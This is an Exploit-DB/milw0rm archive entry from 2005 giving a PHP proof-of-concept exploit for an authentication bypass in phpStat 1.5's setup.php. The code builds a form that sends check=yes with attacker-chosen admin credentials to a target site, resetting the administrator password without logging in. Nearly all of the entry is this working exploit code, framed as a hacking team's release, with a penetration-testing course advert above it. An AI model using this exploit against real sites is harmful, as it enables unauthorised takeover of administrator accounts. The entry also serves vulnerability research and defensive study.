phpStat 1.5 - 'setup.php' Authentication Bypass (PHP) (1)

EDB-ID:

1017




Platform:

PHP

Date:

2005-05-30


Become a Certified Penetration Tester

Enroll in Advanced Web Attacks and Exploitation , the course required to become an Offensive Security Web Expert (OSWE)

GET CERTIFIED

<?php
error_reporting(E_PARSE);
/*
================================================================
PHP Stat Administrative User Authentication Bypass POC Exploit
================================================================
====Trap-Set Underground Hacking Team===========mh_p0rtal============

Greetz to : Alpha_programmer , Oil_karchack , Str0ke   And Iranian Hacking & Security Teams :
Alphast , IHS Team , Shabgard Security Team , Emperor Hacking TEam
, CrouZ Security Team , Simorgh-ev Security Team ,

====================^^^^^^^^^^^^^^^^^^^-=========================
*/
# Config ________________________________
# address - example: http://www.site.com/setup.php Or www.site.com /dir/setup.php

$url = "http://www.site.com/setup.php";

# EnD ___________________________________

print "<form action=\"$url?check=yes&username=$username&password=$password\" >";
print "<input type=\"hidden\" name=\"check\"  value=\"yes\">";
print "Username : <input type=\"text\" name=\"username\"  value=\"admin\" size=\"25\"><br>";
print "Password : <input type=\"text\" name=\"password\"  value=\"abc123\" size=\"25\"><br>";
print ("<input type=submit value=::Change. > \n");
print "</form>";

//------------------------------------------------------End.
?>

# milw0rm.com [2005-05-30]